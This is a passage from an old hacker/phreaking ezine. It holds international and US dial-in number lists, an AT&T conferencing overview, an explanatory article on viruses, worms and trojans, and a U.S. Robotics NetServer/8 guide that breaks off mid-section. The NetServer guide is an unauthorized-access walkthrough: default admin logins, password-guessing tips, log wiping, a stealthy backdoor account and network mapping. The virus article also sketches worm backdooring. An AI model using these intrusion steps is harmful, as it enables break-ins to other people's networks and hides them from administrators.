Taganrog+ 86344 6-2328 Up to 2400bps
Tatarsk+ >> 264 2-2924 Up to 2400bps
Toguchin+ >> 240 2-2992 Up to 2400bps
Toljatti^+ 8480 40-7196 Up to 2400bps
Tomsk^+ 3822 521-100 Up to 2400bps
Tuapse^+ 86167 3-0575 Up to 2400bps
Tula 0872 331824 Up to 9600bps
Tumen^+ 3452 25-1910 Up to 14400bps
Tver^+ 0822 42-7411 Up to 2400bps
Tymovsk+ 42447 2-1667 Up to 2400bps
Ubinskoe+ >> 266 2-1466 Up to 2400bps
Ufa^+ 3472 52-9410 Up to 2400bps
Uglegorsk+ 42432 42-306 Up to 2400bps
Ukhta+ 82147 45280 Up to 2400bps
Ulan-Ude^+ 30122 12077 Up to 2400bps
Uliyanovsk^+ 8422 410188 Up to 2400bps
Uriev-Polsky 09246 02330 Up to 2400bps
Usinsk+ 82144 49-563 Up to 2400bps
Ussuriysk+ 42341 3-6111 Up to 2400bps
Usolje-Sibirskoe^+ 39543 4-5110 Up to 2400bps
Ust-Ilimsk^+ < 235 5-7365 Up to 2400bps
Ustj-Tarka+ >> 272 2-2629 Up to 2400bps
Vengerovo+ >> 269 2-1709 Up to 2400bps
Vladimir 0922 233210 Up to 2400bps
Vladivostok^+ 4232 22-3310 Up to 14400bps
Volgodonsk+ 86392 2-7510 Up to 14400bps
Volgograd^+ 8442 32-9965 Up to 9600bps
Volzhsky+ 8443 421240 Up to 9600bps
Voronezh^+ 0732 73-9815 Up to 2400bps
Vyazniki 09233 23295 Up to 9600bps
Yakutsk^+ 4112 241580 Up to 14400bps
Zdvinsk+ >> 263 21224 Up to 2400bps
Zemograd+ 86359 3-1961 Up to 9600bps
Saipan 670
Garapan 2339005 Up to 14400bps
Singapore 65
Singapore+ 738-0566 Up to 9600bps
Spain 34
Barcelona~~ (9)3 261-3003 Up to 14400bps
Madrid~~ (9)1 327-0565 Up to 14400bps
Sweden+ 46
Gothenburg+ 31 720-4950 Up to 14400bps
Malmo+ 40 600-4950 Up to 14400bps
Stockholm+ 8 5625-1000 Up to 14400bps
Switzerland++ 41
Bern 31 382-6300 Up to 9600bps
Geneva 022 342-5607 Up to 9600pbs
Zurich 1 302-8868 Up to 14400bps
Taiwan 886
Chiayi+ 5 232-4430 Up to 2400bps
5 232-4523 Up to 9600bps
Hsinchu+ 3 531-8946 Up to 2400bps
3 531-1596 Up to 9600bps
Hualan+ 38 362-852 Up to 9600bps
Kaoshiung+ 7 315-1365 Up to 2400bps
7 23-6001 Up to 9600bps
Taichung+ 4 381-4064 Up to 2400bps
4 383-3973 Up to 96000bps
Tainan+ 6 208-1680 Up to 2400bps
6 208-2002 Up to 9600bps
Taipei 2 2739-1063 Up to 14400bps
Taoyang+ 3 352-1781 Up to 2400bps
3 352-1633 Up to 9600bps
Yanlin+ 4 836-4723 Up to 96000bps
Turkey 90
Istanbul 212 2822464 Up to 14400bps
Ukraine+ 7
Kiev+ 044 2465200 Up to 14400bps
Odessa+ 0482 26-2801 Up to 9600bps
United Kingdom 44
Basingstoke 0125 660-0061 Up to 14400bps
Birmingham+ 0121 454-1110 Up to 9600bps
Bristol+ 01179 298-519 Up to 14400bps
Canterbury+ 01227 787-240 Up to 9600bps
Doncaster+ 01302 325-755 Up to 9600bps
Edinburgh, Scotland 0131 459-1290 Up to 14400bps
Exeter+ 01392 490-288 Up to 14400bps
Glasgow+ 0141 221-4033 Up to 14400bps
London 0171 973-1030 Up to 14400bps
660-1234
Manchester 0161 794-1405 Up to 14400bps
Milton Keynes+ 01908 200-361 Up to 14400bps
Newcastle+ 0191 478-1889 Up to 9600bps
Peterborough+ 01733 394-894 Up to 9600bps

Uzbekistan+^ 7
Tashkent+ 3711 144-3910 Up to 9600bps
Venezuela 58
Caracas+ 2 9563400 Up to 14400bps


* This number can only be dialed from cities within this region.
** This is a local call from this city (Dartmouth into Halifax local
calling area and Pointe Claire into Montreal local calling area).
*** Add a 0 before the city code when dialing within this country.
+ Please note: Dial-In access procedures are slightly different than
standard SprintNet procedures. If you need assistance, please
contact Customer Service in Reston, VA, USA at 703-318-7740.
++ Add a 0 before the city code when dialing within this country but
outside of the local calling area.

+++ Add an 82 before the city code when dialing within this country but
outside of the local calling area.
~ - When dialing into Paris FROM another city in France, dial 16
before the dial number.
- When dialing to any city in France FROM Paris, dial 16 before the
dial number.
- When dialing into any city FROM outside of France, dial the
country code 33 and the dial number.
~~ Add a 9 before the city code when dialing within this country but
outside of the local calling area.
~~~ The dial numbers for Vietnam can only be accessed from within Vietnam.
^ Inclusion in the Service Level Agreement (SLA) is determined on a
case by case basis.
^^ If you are a user of the ETPI phone system, please use the 760-1700
number. If you are a user of the PLDT phone system, please use the
816-2006 number.
> Omit the country code (7) when dialing.
>> Novosibirsk Region: for access from other regions dial 383 instead
of 2 in city code.
>>> City code 218 used for connections from Irkutsk.
< City code 23 used for connections from Irkutsk.


]C[ DOMESTIC X.25 DIAL SERVICE


- for asynchronous, SDLC, 3270 BSC, and 2780/3780 applications
- at 1200 and 2400 bps
- with built-in local error protection
- from locations nationwide

X.25 Dial Service sends your data in the enhanced X.25 protocol directly from
a single terminal or a large cluster of terminals attached to a terminal
concentrator supporting X.25.

The service takes full advantage of your advanced equipment's speeds,
built-in memory and processing capabilities. It supports up to 35 concurrent
host sessions on a single call. X.25 protocol and application software
interfaces should be selected based on customer communications requirements.
For areas without local access, use SprintNet's In-WATS service.


In-WATS Service Telephone Number
-----------------------------------
1200-2400 bps 1-800/546-6000

Consult the Data Network Rate Schedule for In-WATS pricing.


Domestic Service Requirements
-----------------------------

SPEED: MODEM TYPE:
1200 bps Bell 212A compatible
2400 bps V.22 bis compatible

1200/2400
ST AC CITY BPS CLASS
---------------------------------------------------------------
AL 205 Birmingham 251-7619 B
AZ 602 Phoenix 271-4467 A
CA 818 Glendale 246-8480 B
CA 213 Los Angeles 622-4913 A
CA 916 Sacramento 446-9811 B
CA 619 San Diego 236-0733 B
CA 415 San Francisco 247-9992 A
CA 408 San Jose 294-9129 B
CA 714 Santa Ana 648-0311 B
CO 303 Denver 745-1580 A
CT 203 Hartford 549-5498 B
DC 202 Washington 296-9095 A
FL 305 Miami 374-1775 A
FL 407 Orlando 898-3669 B
FL 813 Tampa 229-6714 B
GA 404 Atlanta 688-4650 A
IL 312 Chicago 781-0961 A
IN 317 Indianapolis 293-3273 B
IA 515 Des Moines 288-6529 B
LA 504 New Orleans 592-8673 A
MD 410 Baltimore 783-5079 A
MA 617 Boston 292-9572 A
MI 313 Detroit 961-2922 A
MN 612 Minneapolis 338-3327 A
MS 601 Jackson 354-2795 B
MO 314 St Louis 436-2919 A
NJ 971 Newark 624-9463 A
NY 516 Hempstead 565-5751 B
NY 212 New York 645-3500 A
NC 704 Charlotte 373-1589 A
NC 919 Res Tri Park 549-8115 B
OH 937 Cincinnati 241-0831 A
OH 216 Cleveland 771-0228 A
OH 614 Columbus 221-6319 A
OK 405 Oklahoma City 235-9648 B
OR 503 Portland 226-0866 A
PA 215 King of Prussia 265-8060 B
PA 215 Philadelphia 977-8172 A
PA 412 Pittsburgh 281-7815 A
RI 401 Providence 274-1780 B
TN 615 Nashville 242-1762 B
TX 214 Dallas 749-5078 A
TX 713 Houston 227-2931 A
UT 801 Salt Lake City 355-2414 B
VA 804 Norfolk 626-0018 B
VA 804 Richmond 644-0101 B
WA 206 Seattle 343-2862 A
WI 920 Milwaukee 271-0113 A

-----------------------------------------------------------------------------

Well we have reached the end of
  
my garbage for this issue of f4ith. have some
phreaking fun this summer kiddies. "everyone who burns has to learn from
the pain"
. check out #darkcyde on IRC EFnet redshadow EOF



-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ AT&T CONFERENCING ]::::::::[OO--[ by redshadow ]:::::::::::::::::::
-->[OO]:[ INFORMATION ]::::::::::::-[ redshadow@coldmail.com ]:::::::::
-->]OO[:::::::::::::::::::::::::::::::::::[ http://redshadow.faithweb.com ]::


Shouts
-( z0mba | ginger | kraise | hybrid | simmeth | mranon | 9x | #darkcyde )-

_____________________________________________________________________________
=============================================================================

:*: AT&T CONFERENCING INFORMATION :*:
_____________________________________________________________________________
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------

________________________
What is Conferencing ? |
_______________________/


Conferencing is the process where numerous persons dial in to a number and
perform a 'confernce' based either on voice , data [including video] all
covered in this documentation. Many telco's use this service to attract the
travelling business men/women and friends who wish to communicate.

_________________________
Setting up a Conference |
________________________/

AT&T conferences can be setup at
[ https://www.teleconference.att.net/resv/Login.html ] To use this online
form you must have your account created which can be done by calling 1 800
232-1234, ext. 600. where-as you would request an "Internet Reservation
Account Folder"
. An AT&T TeleConference Specialist will assist you in the
enrollment process.

If you call for a reservation, please be prepared to give the AT&T Audio
Conference Specialist this information:

Date and time of the call
Anticipated call duration
Number of participants
AT&T will:

Then you should ...

Schedule the call
Provide a Dial-In telephone number
Provide a six-digit security access code for the Audio Conference host
... this number is used to identify the Audio Conference
Provide a six-digit security access code for participants ... this
number is used to prevent unauthorized participation

Be sure to provide the following to all participants:

Date and time of the Audio Conference
Dial-In access telephone number
Participants' security access code



If you wish to setup a host-dialed audio conference please consult At&t at
Call 0 700 456-1000*. You will be asked to enter the number of connections.
You will be told how to add participants to the conference this type of
conference is available in most locations, calls from hotels and rotary or
public phones may be restricted. Host-Dialed Audio Conference charges will be
billed to your home phone. If you have difficulty getting through, dial
1 800 544-6363. Dial 10+ATT first if calling on a non-AT&T designated line.

If you wish to setup a Operator-Dialed audio conference call Call
1 800 232-1234 for reservation and setup. the AT&T Audio Conference
Specialist will want this information:

Date, time, and time zone of the call
Anticipated call duration
Number and phone numbers of the participants
If your Audio Conference is for a future date:

Your call will be reserved by an AT&T Audio Conference Specialist
You will receive an ID number for easy reference
If you need to make a change before the conference, just call 1 800 232-
1234 ... and be sure to provide your ID number.

If you wish to setup a video or data conference then Call 1 800 VIDEO GO
(1 800 843-3646) To register and place a reservation.

Choose the Best Billing Option ... host or end user, single or multi-
location. Call detail gives you flexibility in managing and controlling
billing to meet your business needs.
_____________________________________
Conferencing Types Supplied by At&t |
____________________________________/

____________________________________
:: AUDIO CONFERENCING ::::::::::::::

Audio conferencing the most popular conference type is divided into three sub
groups [Dial-in audio conference, host-dialed audio conference, and operator-
dialed audio conference] all different AT&T services for the public to use.


### Dial-In Audio Conference Service

Dial-In audio conference service from AT&T alows participants to call into
the Audio Conference from virtually any telephone, including hotel phones and
public payphones. This service is available all the time and conferences can
be between 15 minutes and 24 hours in duration. Conferences can have up to
150 connections. These connections can be from anywhere on the globe. These
converences are secured by authorization codes [6 digit codes].

### Host-Dialed Audio Conference

This service is for conferences you want to set up yourself. You can talk for
up to 5 hours on this conference and host up to 15 connections, including
host. Participants are added one at a time

### Operator-Dialed Audio Conference Service

Operator-dialed audio conferences allow you to have unlimited connections for
your confernce, which can also last 24 horus. This conference can be logon
to from anywhere on the globe. Operator-dialed audio conferences can also
host special services to ...

Host listening-only for participatents
Establish who is present on the call
Recording on audiocassette
Written transcription of the recorded conference
Translation services

____________________________________
:: VIDEO CONFERENCING ::::::::::::::


Video conferencing enabled with video systems or personal computers equipped
with video capabilities. Allows groups to interact live in video with one and
another using At&t communications with a genuine interactive conference
including voice, video and data. AT&t allows the option for users of this
service to connect three of more sites with multipoint bridging, connect
locations with dissimilar video equipment with Codec conversion, connect
locations using different digital transmission speeds with speed conversion
and rate adaptation, connect network-linked locations linked to other
Spacenet locations with GE spacenet satellite services, and enhance video
quality with inverse multiplexing to combine channels for increased
bandwidth. Two video conference options are dial-out and dial-in. Dial-out
is where you set the reservation and at&t will dial out all participants and
bring them into the conference, dial-in is where the participants dial into
the video conference themselves. Changes in your conference can be performed
by a seperate touch tone telephone. Audio participants can interact with the
Video conference.

_____________________________________
:: VIDEO/DATA SHARING CONFERENCING ::


AT&T Video/Data Sharing Conferencing is your key to holding
"virtual meetings." These genuine interactive desktop conferences include
voice, video, and data for complete real-time business communication. In this
conference you can have access to services that allow sharing of computer
applications and data files Like the video conference this video/data
conference offers the choice of you allowing at&t to connect the participants
with dial-out or allow them to access the conference with dial-in.

_________________
Closing Remarks |
________________/

Well we have arrived at the end of my At&t conferencing document for this
issue of f4ith many thanks go to d4rkcyde for letting me publish such
material. to At&t for supplying this great service and the information in
this document. Many thanks also goes to the phreaking community and all my
friends for saying "Cool!" when i pulled off stunts at telephone booths and
elsewhere. May phreaking always be fun before everything else. redshadow



-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ Computer Virii ]::::::[OO--[ by [JaSuN] ]--[ jasun@phreaker.net ]::
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


--oOo--> Computer Virii And Other Malicious Programs ]-----
--oOo--> --------------------------------------------------
--oOo--> Main Article Introduction ]---
--oOo--> Introduction To Virii ]---
--oOo--> What Can Be Affected ]---
--oOo--> Virus Threat ]---
--oOo--> Types Of Virii ]---
--oOo--> --* Boot Sector ]---
--oOo--> --* File Infecting ]---
--oOo--> --* Multi-Partite ]---
--oOo--> --* Polymorphic ]---
--oOo--> --* Stealth ]---
--oOo--> Worms ]---
--oOo--> Trojan Horses ]---
--oOo--> Logic Bombs ]---
--oOo--> Legal Issues ]---
--oOo--> Conclusion ]---
--oOo--> Disclaimer ]---
--OoO--> ============================================= ]---

Main Article Introduction:
==========================
In this article I will explain what different types of destructive computer
programs exist and what problems they can sometimes cause. People often get
confused with the different terms commonly used, so you should have more
of an accurate idea by the time you have finished reading this article.

Introduction To Virii:
======================
A virus is a computer program that executes when an infected program is run,
therefore only executable files can be infected. That fact alone confuses
many people, some people assume that any file can be infected, which is not
the case. On Windows based systems, executable files have the extensions of
.exe, and .com, although other files can be run such as .bat files which can
also be modified to run arbitrary commands or operations.

A virus infects other programs with a copy of itself. Each one has the
ability to clone itself so that it can multiply, constantly seeking new files
to infect. Some of the most harmless Virii do nothing but multiply,
replicating and spreading around onto new uninfected computer systems.

More dangerous Virii, not only replicate themselves, they also damage or
modify other programs. These Virii are more annoying, as they can cause
data loss and are more time consuming to remove. When these Virii
start causing damage to a system, they have activated their built in payload.
Some Virii have a very dangerous payload, others are just designed to be
annoying, by displaying a message on screen or playing a funny sound.

Virus programs and other malicious programs are often very small, sometimes
only a few kilobytes in size. This enables the virus to be easily hidden
from Anti-Virus scanners. Virii can infect any computer, it does not make
any difference if it is a laptop or a network server. Different Virii
exist for different Operating Systems, there are Virii for all of them,
although more exist for Windows than any other.

Once a virus has been written, it can be distributed very easily be the
author, the main means of doing this today would be to use the Internet.
Once on the Internet, it will be available to anybody, to either distribute
to others with knowledge of what it is, or by accidental means. The Internet
is not the only way for the new virus to replicate. It may be given to
people on disk, who then use it in their computer, which is on a company
network, for example.

These factors make it harder to trace the virus back to the author, or the
person that actually released it into the pubic domain. Once a virus is
active on a host computer, it could spread onto large networks. One of the
main protections against this, is using good Anti Virus Software. If the
virus is detected before its payload is released or is it able to spread
then the results will be better than if the virus had discharged its payload.

Virii enter computer systems from external sources, Virii are made to be
attractive. An example would be a new application that is available for
download from the Internet. People may download it, run the installation
program, then the new virus is out on their system. During the time before
the virus was undetected by conventional Anti Virus Software, it may have
caused a lot of damage. For this reason, it is important to keep the
database patterns that the anti viral software uses upto date.

A virus can also be programmed to activate straight away or it can be
made to lie dormant for a certain period of time, until a certain date or
action triggers it. There are also many other variations that can be
made to activate a virus or its payload. Timer functions of a virus
are provided by the Logic Bomb.

There are a lot of ways a virus can spread, although some methods are
more common than others. For example, if you download a piece of software
from the Internet, then take it into work on a disk without checking it for
any infections, you may risk infecting the company network.

If the downloaded software was in fact clean, it could still be infected
once it is on your computer. Floppy disks were the main method of
transporting Virii, today they are not used as much as before, because of
the constantly expanding Internet, files can be sent quickly and easily
by using email.

What Can Be Affected:
=====================
There are a number of characteristics that need to be in place for a
virus infection to take place. For example, the file must be:

****-> Executable
****-> Stored on a write-enabled disk
****-> Have individual write properties

Write protecting a disk can stop some infections, but at some point
you will want to write to a disk so you would need to remove the
read-only property. At this point the files on the disk are open
to being written to.

In the case of a Hard Disk Drive, it would
not be an option to write protect it, as the operating system will
need to write to it. If you wanted to do this, setting the read only
properly on executable files would be more appropriate.

This is not the only protection, the most important step is the anti virus
software. If a virus were to attach itself to a file, then the file size
would change, most scanners would notice this, the checksum of the file
will change as well, which is another thing to look out for.

Some Virii will cause the checksum to report as being what it should be,
so that test can be bypassed. Another difficult location to detect a
virus would be on the first physical sector of a Hard Disk Drive, known
as the (FAT) File Allocation Table.

Virus Threat:
=============
Some people have never encountered a virus infection or seen any
evidence of what an infection has done to anybody. Some people that use
anti-virus scanning software, have never had a warning about an infection
either. So is this problem just over speculated or is the threat as big
as the anti-virus scene makes it out to be?

There are Virii out there, the threat is large if you don't take the
correct precautions. The real problem is that once a virus is released
into the computing world, it is still a problem as long as one copy exists.
As Virii replicate, one copy of a virus can literally turn into thousands.

If the threat is so big, where are all the reports of virus attacks?
There are a few that hit the news, most never make it into the headlines
unless they cause a lot of damage or spread rapidly. Most companies
don't like to report their encounters with Virii, as they don't want it
to be broadcast publicly.

There are opinions that anti-virus companies release the Virii into the
community to help sell their products. Some people will agree with this,
but if you are into the virus scene, you will know that this in the most
part is not true, as if you are in the scene you will know people that
code and release Virii, either for educational purposes or to cause
infections.

Either way, the virus programmers will continue to release Virii and
the anti-virus community will continue to make a large amount of money
from it. Usually, the virus programmers get a sense of power, when they
know that their new virus is out there, undetected by commercial software.
In one respect, it is a fight between the virus programmers to beat the
anti-virus companies by trying to release a virus that stays undetected
for a long period of time.

Types Of Virii:
===============
There are a number of types of Virii that can infect computer systems.
The more common types are:

****-> Boot Sector
****-> File Infecting
****-> Multi-Partite
****-> Polymorphic
****-> Stealth

Boot Sector Virii:
==================
Boot sector Virii infect the boot sector, which is also known as the
master boot record. Firstly, the original boot sector would be
overwritten or moved, if moved it would be placed on another sector
of the hard disk, which would then be marked as bad, so it would
not be used in the future. A boot sector virus can be difficult
to detect, since they are usually programmed well. As the boot sector
is the first thing read from a hard disk on booting the computer,
it is usually more difficult to detect boot sector Virii.

Out of all the Virii infections that are reported, three out of every
four are boot sector Virii. The only real way to become infected
with a boot sector virus is to boot the computer with an infected floppy
disk in the floppy drive. The boot sector is protected more now,
by using built in protection in the BIOS, it will warn you if anything
tries to modify the boot sector. As the boot sector is only usually
modified when a new operating system is installed, if your BIOS
warns you that the boot sector is about to be modified you should run a
complete anti virus scan and make sure you have the latest updates
for you scanner.

File Infecting Virii:
=====================
These Virii only infect executable files, which have the extensions
of .exe and .com, they are also usually memory resident. Some file
infecting Virii are programmed to only infect *.com or *.exe and others
are designed to only infect files with certain letters in them,
for example. In comparison to boot sector Virii, they act in much the
same way by moving the original code to another part of the file and
replacing it with its own infection code.

The size of the infected file would increase after that process,
which enables detection to become easier in same cases as anti-virus
software could alert you that the size of the file has changed, even if
it does not detect that it is infected with a known virus.

Sometimes the virus would change the extension of the infected file,
to hide it from detection until a later date, as some anti-virus scanner
software only checks files with the extensions of .exe or .com.
Most newer software is more advanced and you can configure it to scan
whichever file types that you want.

Polymorphic Virii:
==================
Polymorphic Virii are probably the most advanced Virii of all.
They can change their appearance with each infection, which makes it
more difficult to detect them. Also, they usually have an encryption
routine to help hide themselves and it also acts as an anti-debugging
mechanism, to stop an-Virii companies finding out how it infects
and it also stops people from taking the code without permission from the
author and using it in their own Virii.

Not only do they have the ability to encrypt, they can also change the
encryption algorithm with each infection as well as the way they infect.
As this makes detection more difficult, anti-virus software must be able
to perform algorithmic scanning as well as string based scanning
methods to successfully detect an infection from a Polymorphic virus.

Stealth Virii:
==============
These Virii attempt to hide, without being noticed from the Operating
System and any installed anti-virus scanning software. To achieve this,
the virus must stay resident in memory (TSR). By staying in memory,
it can make changes to files and directories easily.

As the virus is memory resident, there will be less memory available to the
system, although this type of virus is usually small, so would not take up
memory. Good anti-virus software will detect and remove resident Virii from
memory, which needs to be completed before the disk based components of the
virus can be removed.

Multi-Partite Virii:
====================
These type of Virii infect the boot sector and executable files.
They are also the most difficult to detect, as they can combine
techniques from the other types of Virii. The damage caused from an
infection from one of these types of Virii can be the most damaging,
sometimes causing a total loss of data on computer systems. Some of the
more advanced Virii, can also spread over a network, which when combined
with the other techniques used to avoid detection and removal, can cause
a company network to grind to a halt. For this reason, it is always a good
idea to keep important data backed up, as it is better to be safe than sorry.

Introduction To Worms:
======================
Apart from Virii, there are a number of other programs that are designed
to be destructive to computer systems. Worms are also programmed to alter or
destroy data, but their main difference from Virii is that they can be
programmed to exploit holes in various operating systems in order to gain
access to the system. In that sense, they do replicate to other hosts
but they do not spread in the same way as Virii do by simply spreading
onto floppy disks.

The damage that worms can cause can be just as serious as a virus attack,
especially if not discovered in time. For example, a worm could be
programmed to exploit mountd, to gain access to a vulnerable host.
Firstly, the worm would have to be released on a system, once on that
system, it could scan an IP subnet and find hosts that are open to being
exploited. Once into a system, it could then patch the hole that allowed
it to gain access originally, then proceed to backdoor the system and run
a scan on another IP class. It could also email a list of exploited hosts
hosts to an account that had been set-up by the author, or another
individual that releases it.

This process of replication could continue, as long as there are hosts
to exploit. Considering that a lot of systems are not patched against
new exploits straight away, it would be quite a field day for a new worm that
uses that new hole to gain access.

Introduction To Trojan Horses:
==============================
A Trojan Horse is a destructive program that has been concealed inside
another genuine piece of software. In addition to this, a worm or virus
would be hidden inside a Trojan Horse. The main reason a Trojan Horse is not
a virus, is because they do not replicate like Virii. There is a long
history behind the origin of the Trojan Horse. When Greek warriors built a
large, attractive wooden horse they were able to hide their warriors inside.
They left it outside the gates of the city of Troy. When the Trojans saw it,
they thought it was part of a peace offering and gladly opened the gates and
took it into their city. Once inside the Greek warriors jumped out and
started fighting with the Trojans and destroying their city.

Trojan Horse software works in the same way. The software package might look
good and seem genuine, which gives the user the piece of mind they want, so
they download and run the executable. The software package itself is
legitimate but the Trojan Horse is lurking inside and will be able to get out
once the executable is run. Once out, it could continue with what it was
programmed to do, at this point it may act like some Virii and wait until a
certain date or other activation method, before proceeding to release its
payload.

Trojan Horses can also be programmed to self-destruct, leaving no trace of
their existence, apart from the damage that they have caused if not
discovered in time. A Trojan Horse is particularly good for the once common
banking crime known as Salami Slicing, in which small sums of money are
transferred from a number of accounts into another account operated by an
intruder. Due to increasing security, that and other schemes are harder to
complete successfully as time goes on.

Introduction To Logic Bombs:
============================
A Logic Bomb is similar to a Trojan Horse. Each has the ability to damage
or destroy data, the difference is that a Logic Bomb has a timing device
so that it can be programmed to go off at a particular date or time.
For example, the Michelangelo virus is embedded inside a Logic Bomb.
Logic Bombs can still be very destructive on their own, as they usually
are developed in much the same manner as Virii are, even if they lack the
ability to replicate as Virii can.

Logic Bombs are timed to do maximum damage. Once example of this would be
an ex-employee, that wants to cause some damage to the company network.
They could install a Logic Bomb on the network computers and set it to
activate months after they have left.

Legal Issues:
=============
There are a number of legal issues related to Virii and other malicious
programs. To program and virus and put it up on your website for
educational purposes in source/binary form should not be illegal.
Of course, people will download it and then distribute it to people to
cause damage to their systems, this would be illegal.

Regardless or being illegal or not, people will still continue to write
and distribute Virii and other infecting programs that allow
unauthorised access to computer systems.

Conclusion:
===========
I hope that you enjoyed reading this article and that you actually learned
some new information from it. If you have any comments or suggestions about
this article, please feel free to send me an email: jasun@phreaker.net
I hope this gave you a little insight into the world of the virus and other
related programs.

Look out for more articles from me in the future. I have made this
information as accurate as possible to my knowledge, but don't complain if I
made an error, most of this was written at times around 4am in the morning.

Disclaimer:
===========
This document is for educational *INTERNAL USE ONLY*
It is for educational purposes only, the information contained within it must
not be used to cause damage to any person/system. What you do with this
information is your business, but anything that arises from its misuse cannot be
held against anybody, apart from yourself.


-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[:[ US Robotics ]::::::::::::::[OO--[ by hybrid ]::::::::::::::::::::::
-->[OO]:[ NetServer/8 ]::::::::::::::::::-[ hybrid@dtmf.org ]::::::::::::::::
-->]OO[:::::::::::::::::::::::::::::::::::[ http://hybrid.dtmf.org ]:::::::::


An Introduction to the
U.S. Robotics NetServer/8
by hybrid (hybrid@dtmf.org)


Welcome to my brief article explaining different commands etc on the U.S
Robotics NetServers which are becomming incresingly popular. These servers
are an extream sercutity risk to any network that uses them for network
managment, they essentialy give whoever has administrator access _total_
control over its surrounding network, after all, the NetServer is designed
for network managment, I'll go into this in detail in a while. So why am I
writting this article? -- Well I stumbled accross a website one night which
featured information on the U.S. Robotics NetServer, the site's content was
basically braging about the "tough security" of the NetServer, after seeing
this, and I manageed to stop laughing, I decided to write this file, for
your enjoyment :)

So lets take a look at the NetServer. You are likely to stumble accross this
type of system either by the means of dialup modem, or by ip, telnet etc.
The NetServer will identify itself like this:

Welcome to USRobotics
The Intelligent Choice in Information Access
login:

Note: in most cases admins have made an 'intelligent' choice in choosing this
server for thier networks, but when it comes to system security, I would
avoid the phrase 'intelligent' by a mile. The NetServer, like most OSs/
net amnagment systems, comes with a nice set of factory default logins, which
in most cases will give whoever has these logins super-user access to the
network. Hmm, ok (thats _real_ security - well done USRobotics) When loging
in, the following default accounts will usually get you in:

USER PASSWORD ACCESS LEVEL
---- -------- ------------
admin admin god
default default enough to get god access
....... ........ ........................
manager manager god } I've only ever seen
guest guest not good enough these a few times.

The access that I am going to focus on with this file is the admin access.
The admin account will nearly all the time exist, so try variations of the
password, you know, the usuall shit:

admin manager
admin <no pass> } on some systems I have noticed that finger port
admin administrator (79) is open, and will list a suprising amount of
admin root info about the admin, ie: last name, location etc,
admin manage this would maybee be you're advantage when guessing.

Okee then, you got in. You'll be confronted with somthing a little like this:

NetServer: } the command line shell. You have several choices,
including <help> or <?>.

Right, here are the choices.

CONNECT LOGOUT TELNET
EXIT MANAGE
HELP RLOGIN

Very self explanitory, but there are a few things you need to know. To begin
with, the netserver uses differnt keys to edit.. Command Line Edit: The
following options are available:
--------------
^a - start of command ^b - left 1 char ^d - delete char
^e - end of command ^f - right 1 char ^n - next command
^p - prev command ESCb - left 1 word ESCf - right 1 word
<- - left 1 char -> - right 1 char
up arrow - prev command down arrow - next command
--------------

The main option you are interested in from the above menu is the MANAGE
command. Once you have entered the manage session you will be confronted with
the following command line prompt:

manage: or session: (user definable).. hit <?> you will get the following
options..
------------
ADD HANGUP RENAME
ARP HELP RESET
ASSIGN HIDE RESOLVE
BYE HISTORY RLOGIN
COPY KILL SAVE
DELETE LEAVE SET
DIAL LIST SHOW
DISABLE LOGOUT TELNET
DO PING UNASSIGN
ECHO QUIT VERIFY
ENABLE REBOOT
EXIT RECONFIGURE

Nice huh? :) right, now I'm going to go into each command in detail, right
from <add> to <verify> and all the sub-commands.

-----------
<ADD>

APPLETALK IP SNMP
DNS IPX SYSLOG
FILTER LOGIN_HOST TFTP
FRAMED_ROUTE MODEM_GROUP USER
INIT_SCRIPT NETWORK
------------

The add command is used to upgrade, or add to the current network from which
the netserver is hosted. For example, you can update DNS server
configurations/routes/ip designation etc, aswell as link other networks to
work in synthony with each other. The commands are very self explanitory, and
will offer help as you go along. A note though: on most systems the log file
will begin loging everything if it notices a sudden rises in command line
activity, this is not for security reasons, but more for administration
debug, you can alter this if you like, or wipe the log file all together,
more on that in a bit.

When updating/or adding network configurations, the IP formating for the
netserver is as follows:
------------
This field is a IP Host Name or an IP Network Address
The expected format is Station_Address{/Mask_Specifier}
The expected format for the address is a.b.c.d
Each value must be in the range of 0 to 255 decimal.
The address 127.x.x.x is reserved for Loopback and cannot be specified.
The Mask Specifier can be in ip address format
in which case it must be 255.0.0.0 or greater and contiguous
or 'A', 'B', or 'C'
or a numeric value from 8 to 30
describing the number of one bits in the mask
If this is being used to set a User's IP Address
The Mask Specifier can also be 'H' (for Host)
or a numeric value to 32

But before we go and do anything crazy, take a look at the current system
configuration/setup. Here are the options, turn asci log on for future
reference (don't be dumb, 3DES ;) ..

session:list<enter>
CLI - Missing Required Argument(s):

This field is a KEYWORD. The possible values are:
AARP FILTERS PROCESSES
ACTIVE INIT_SCRIPTS SERVICES
APPLETALK INTERFACES SNMP
AVAILABLE IP SWITCHED
CONNECTIONS IPX SYSLOGS
CRITICAL LAN TCP
DIAL_OUT LOGIN_HOSTS TFTP
DNS MODEM_GROUPS UDP
FACILITIES NETWORKS USERS
FILES PPP
.....................
manage:show<enter>
This field is a KEYWORD. The possible values are:
ACCOUNTING DNS NETWORK
APPLETALK EVENTS PPP
AUTHENTICATION FILE SECURITY_OPTION
CLEARTCP FILTER SNMP
COMMAND ICMP SYSTEM
CONFIGURATION IMODEM TCP
CONNECTION INTERFACE TELNET
CRITICAL_EVENT IP TIME
DATE IPX UDP
DDP MEMORY USER
DIAL_OUT MODEM_GROUP

As you can see, there are plenty of commands at your dispossal. First, its
always a good idea to check who else is on the system/server, so we use the
list connections command, it should look a little like this:

session:list connections<enter>

CONNECTIONS
IfName User Name Type DLL
mod:1 shitface DIAL_IN PPP
mod:3 admin DIAL_IN NONE <-- you
..........

The netserver will also have dialout commands, but, this is only using the
server for somthing lame, its full potential is in the IP routing. To check
to see if dialout is enabled anyway, just use the <list dialout> command,
that will tell you what serial pools the modems are connected to. OK then,
now we are going to focus on configuring an account for ourselves, and
blending into the user list with stealth. Before hand though, you need as
much information on the system as possible. So here we go.

session:list dns servers<enter>

DNS NAME SERVERS
Preference Name Address Status
1 123.111.200.011 ACTIVE
session
.............

To gather IP addressing/routing information we can use the following
commands:
---------------
session:list ip<enter>
CLI - Missing Required Argument(s):
This field is a KEYWORD. The possible values are:
ADDRESSES INTERFACE_BLOCK ROUTES
ARP NETWORKS

session:list ip addresses<enter>

IP ADDRESSES
Bcast Reassembly
Address Algo Max Size Interface
127.000.000.001/A 1 3468 loopback
